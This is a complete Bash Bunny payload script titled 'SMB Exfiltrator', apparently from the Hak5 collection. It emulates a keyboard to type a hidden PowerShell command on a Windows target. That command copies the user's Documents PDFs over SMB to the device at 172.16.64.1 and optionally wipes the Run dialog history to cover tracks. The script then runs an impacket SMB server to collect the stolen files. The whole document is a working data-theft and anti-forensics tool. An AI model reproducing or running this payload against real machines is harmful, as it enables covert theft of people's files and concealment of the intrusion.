#!/bin/bash
#
# Title:         SMB Exfiltrator
# Author:        Hak5Darren
# Version:       1.0
# Category:      Exfiltration
# Target:        Windows XP SP3+ (Powershell)
# Attackmodes:   HID, Ethernet
# 
# 
# Red Blink Fast.......Impacket not found
# Red Blink Slow.......Target did not acquire IP address
# Amber Blink Fast.....Initialization
# Amber................HID Stage
# Purple Blink Fast....Ethernet Stage
# Blue Interstitial....Receiving Files
# White................Moving loot to mass storage
# Green................Finished
#
# OPTIONS
LOOTDIR=/root/udisk/loot/smb_exfiltrator
EXFILTRATE_FILES="*.pdf"
CLEARTRACKS="yes" # yes or no

# Initialization
LED R G 100


# Check for impacket. If not found, blink fast red.
if [ ! -d /pentest/impacket/ ]; then
  LED R 100
  exit 1
fi


# HID STAGE
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
# Once found, initiates file copy and exits
LED R G
ATTACKMODE HID
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell -windowStyle minimized \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""
QUACK ENTER

# Clear tracks?
if [ $CLEARTRACKS == "yes" ]; then
   QUACK DELAY 500
   QUACK GUI r
   QUACK DELAY 500
   QUACK STRING powershell -windowStyle minimized -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
   QUACK ENTER
fi


# ETHERNET STAGE
LED R B 100
ATTACKMODE RNDIS_ETHERNET


# Setup SMB server to receive loot in staging area
mkdir -p /root/loot/smb_exfiltrator/temp/
# house cleaning
rm -rf /root/loot/smb_exfiltrator/temp/*
# Fire up SMB Server
/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ &


# Source bunny_helpers.sh to get environment variables
source bunny_helpers.sh


# Give target a chance to start exfiltration
sleep 2


# Make loot directory based on hostname (increment for multiple uses)
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p $LOOTDIR/$HOST-$COUNT


# Check target IP address. If unset, blink slow red.
if [ -z "${TARGET_IP}" ]; then
    LED R 1000
	exit 1
fi


# Wait until exfiltration is complete
last=0
current=1
while [ "$last" != "$current" ]; do
   last=$current
   current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1)
   LED B
   sleep 1
   LED R B 100
   sleep 9
   # Files are still being copied. Loop. 
   # (Issue may exist if file takes longer than 10s to copy)
done


# Move files from staging area to loot directory
LED R G B
mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT
sync; sleep 1; sync

# Trap is clean
LED G
